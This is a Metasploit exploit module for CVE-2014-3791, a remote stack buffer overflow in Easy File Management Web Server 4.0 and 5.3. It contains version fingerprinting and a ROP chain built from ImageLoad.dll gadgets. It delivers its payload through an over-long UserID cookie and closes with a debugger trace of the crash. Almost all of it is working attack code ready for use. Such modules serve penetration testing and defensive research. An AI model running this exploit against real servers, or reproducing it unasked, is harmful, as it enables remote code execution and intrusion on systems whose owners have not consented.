##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
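# Stack buffer overflow in Easy File Management Web Server (efmws.exe) 4.0 / 5.3
# via an over-long UserID cookie (CVE-2014-3791). The overflow is turned into
# code execution with a short ROP chain built from ImageLoad.dll gadgets.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking # Reliable memory corruption

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Easy File Management Web Server Stack Buffer Overflow',
        'Description' => %q{
          Easy File Management Web Server v4.0 and v5.3 contains a stack buffer
          overflow condition that is triggered as user-supplied input is not
          properly validated when handling the UserID cookie. This may allow a
          remote attacker to execute arbitrary code.
        },
        'Author' => [
          'superkojiman', # Vulnerability discovery
          'Julien Ahrens', # Exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-3791'],
          ['OSVDB', '107241'],
          ['EDB', '33610'],
          ['BID', '67542'],
          ['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
          ['URL', 'http://www.web-file-management.com/']
        ],
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Payload' => {
          # NUL, CR, LF and ';' would terminate or split the cookie value.
          'BadChars' => "\x00\x0a\x0d;",
          'Space' => 3420 # Lets play it safe
        },
        'Targets' => [
          # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:
          # -- Microsoft Windows XP [Version 5.1.2600]
          # -- Microsoft Windows [Version 6.1.7600]
          # -- Microsoft Windows [Version 6.3.9600]
          #
          # 'Ret' => 0x10010101 : pop ebx ; pop ecx ; retn (ImageLoad.dll)
          #
          # 'Esp' is not a raw address: the real jmp/push-esp gadgets live in
          # efmws.exe below 0x01000000, so their top byte is 0x00 -- a bad
          # character. The chain therefore carries (gadget - 0x5bffc883) and
          # the 'add eax,5bffc883 ; retn' gadget reconstructs it at run time:
          #   0xA445ABCF + 0x5bffc883 = 0x00457452 : jmp esp            (5.3)
          #   0xA4518472 + 0x5bffc883 = 0x00514CF5 : push esp ; retn 0c (4.0)
          ['Automatic Targeting', { 'auto' => true }],
          ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],
          ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }]
        ],
        'DisclosureDate' => '2014-05-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
      ]
    )
  end

  # Fingerprints the server version.
  #
  # /whatsnew.txt is authoritative; the Server header is only a fallback
  # because version 5.3 still advertises itself as "4.0" there.
  #
  # @return [String, nil] the version string (e.g. "4.0", "5.3"), or nil when
  #   the host is unreachable or neither source yields a version
  def get_version
    res = send_request_raw({ 'uri' => '/whatsnew.txt' })
    unless res
      vprint_error 'Connection failed'
      return nil
    end

    body_match = res.body.to_s.match(/What's new in Easy File Management Web Server V(\d\.\d)/)
    if body_match
      version = body_match[1]
      vprint_status "Found version: #{version}"
      return version
    end

    header_match = res.headers['server'].to_s.match(/Easy File Management Web Server v(4\.0)/)
    if header_match
      version = header_match[1]
      vprint_status "Based on Server header: #{version}"
      return version
    end

    nil
  end

  # Unknown when the version cannot be determined, Appears when a target
  # exists for the detected version, Safe otherwise.
  def check
    version = get_version
    return Exploit::CheckCode::Unknown if version.nil?
    return Exploit::CheckCode::Appears if target_for_version(version)

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status('Fingerprinting version...')
    version = get_version

    if target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") if version.nil?

      my_target = target_for_version(version)
      # A detected but unsupported version used to fall through with a nil
      # target and die later on my_target.ret; fail explicitly instead.
      fail_with(Failure::NoTarget, "#{peer} - No target for detected version #{version}") unless my_target

      print_good("Version #{version} found")
    else
      my_target = target
      unless version && my_target.name.include?(version)
        print_error("The selected target doesn't match the detected version, trying anyway...")
      end
    end

    sploit = build_chain(my_target)

    print_status "Trying target #{my_target.name}..."

    # The request must be complete and well-formed to reach the vulnerable
    # cookie handling; a reply is not needed, hence the short timeout.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;"
    }, 1)
  end

  private

  # The non-automatic target whose name carries +version+, or nil.
  #
  # @param version [String] version string as returned by #get_version
  # @return [Msf::Module::Target, nil]
  def target_for_version(version)
    targets.find { |t| !t['auto'] && t.name.include?(version) }
  end

  # Builds the UserID cookie value: padding, the ROP chain that lands in a
  # jmp/push esp gadget, then the encoded payload.
  #
  # @param my_target [Msf::Module::Target] must provide 'Ret' and 'Esp'
  # @return [String]
  def build_chain(my_target)
    chain = rand_text(80)                      # junk
    chain << [0x1001D8C8].pack('V')           # push edx
    chain << rand_text(280)                   # junk
    chain << [my_target.ret].pack('V')        # pop ebx ; pop ecx ; retn
    chain << [my_target['Esp']].pack('V')     # -> ebx = encoded jmp/push esp address (see Targets)
    chain << [0x10010125].pack('V')           # -> ecx; contains 00000000 to pass the jnz instruction
    chain << [0x10022AAC].pack('V')           # mov eax,ebx ; pop esi ; pop ebx ; retn
    chain << rand_text(8)                     # consumed by the two pops above
    chain << [0x1001A187].pack('V')           # add eax,5bffc883 ; retn  -> eax = real esp gadget
    chain << [0x1002466D].pack('V')           # push eax ; retn          -> lands on esp / payload
    chain << payload.encoded
    chain
  end
end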
=begin
#
# 0x44f57d: this rep movs copies the UserID cookie value up the stack. If
# UserID is too large it overwrites a pointer that is dereferenced later at
# 0x468702 (call dword ptr [edx+28h], with edx now attacker-controlled).
#
eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
fmws+0x4f57d:
0044f57d f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:004> dd @esi
01668084 41414141 41414141 41414141 41414141
01668094 41414141 41414141 41414141 41414141
016680a4 41414141 41414141 41414141 41414141
016680b4 41414141 41414141 41414141 41414141
016680c4 41414141 41414141 41414141 41414141
016680d4 41414141 41414141 41414141 41414141
016680e4 41414141 41414141 41414141 41414141
016680f4 41414141 41414141 41414141 41414141
(c38.8cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
fmws+0x68702:
00468702 ff5228 call dword ptr [edx+28h] ds:0023:41414169=????????
=end